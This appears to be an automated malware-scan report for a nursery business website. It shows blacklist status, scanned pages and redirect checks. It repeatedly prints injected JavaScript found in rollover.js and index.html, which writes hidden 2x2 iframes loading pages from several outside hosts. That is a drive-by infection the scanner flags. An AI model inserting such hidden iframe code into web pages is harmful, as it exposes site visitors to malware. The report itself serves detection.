Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=foxfarmsnursery.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://foxfarmsnursery.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://foxfarmsnursery.com/ | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/./rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> | ||
http://foxfarmsnursery.com/./index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> | ||
http://foxfarmsnursery.com/././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/./././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> | ||
http://foxfarmsnursery.com/./././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/././././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> | ||
http://foxfarmsnursery.com/././././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/./././././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> | ||
http://foxfarmsnursery.com/./././././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/././././././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> | ||
http://foxfarmsnursery.com/././././././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> | ||
http://foxfarmsnursery.com/./././././././rollover.js | 200 OK Content-Length: 1464 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ } image.over.src = s; loaded[image.name] = image; } } function F_roll(imageName,over) { if (document.images) { if (over) { imageObject = "over"; } else { imageObject = "out"; } image = loaded[imageName]; if (image) { ref = eval("image."+imageObject); if (ref) image.src = eval("image."+imageObject+".src"); } if (window.event) window.event.cancelBubble = true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ef-srilanka.org/whws.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whws.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?j=1317331> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1317331> | ||
http://foxfarmsnursery.com/./././././././index.html | 200 OK Content-Length: 18755 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heoi.html?i=1317331 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heoi.html?i=1317331> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: foxfarmsnursery.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Jul 2014 03:10:49 GMT
Accept-Ranges: bytes
ETag: "1fc000bb-4943-4d7a159f5685f"
Server: Apache
Content-Length: 18755
Content-Type: text/html
Last-Modified: Mon, 11 Mar 2013 07:45:05 GMT
X-Powered-By: PleskLin
...18755 bytes of data.
GET / HTTP/1.1
Host: foxfarmsnursery.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Jul 2014 03:10:49 GMT
Accept-Ranges: bytes
ETag: "1fc000bb-4943-4d7a159f5685f"
Server: Apache
Content-Length: 18755
Content-Type: text/html
Last-Modified: Mon, 11 Mar 2013 07:45:05 GMT
X-Powered-By: PleskLin
...18755 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: foxfarmsnursery.com
Referer: http://www.google.com/search?q=foxfarmsnursery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: foxfarmsnursery.com
Referer: http://www.google.com/search?q=foxfarmsnursery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.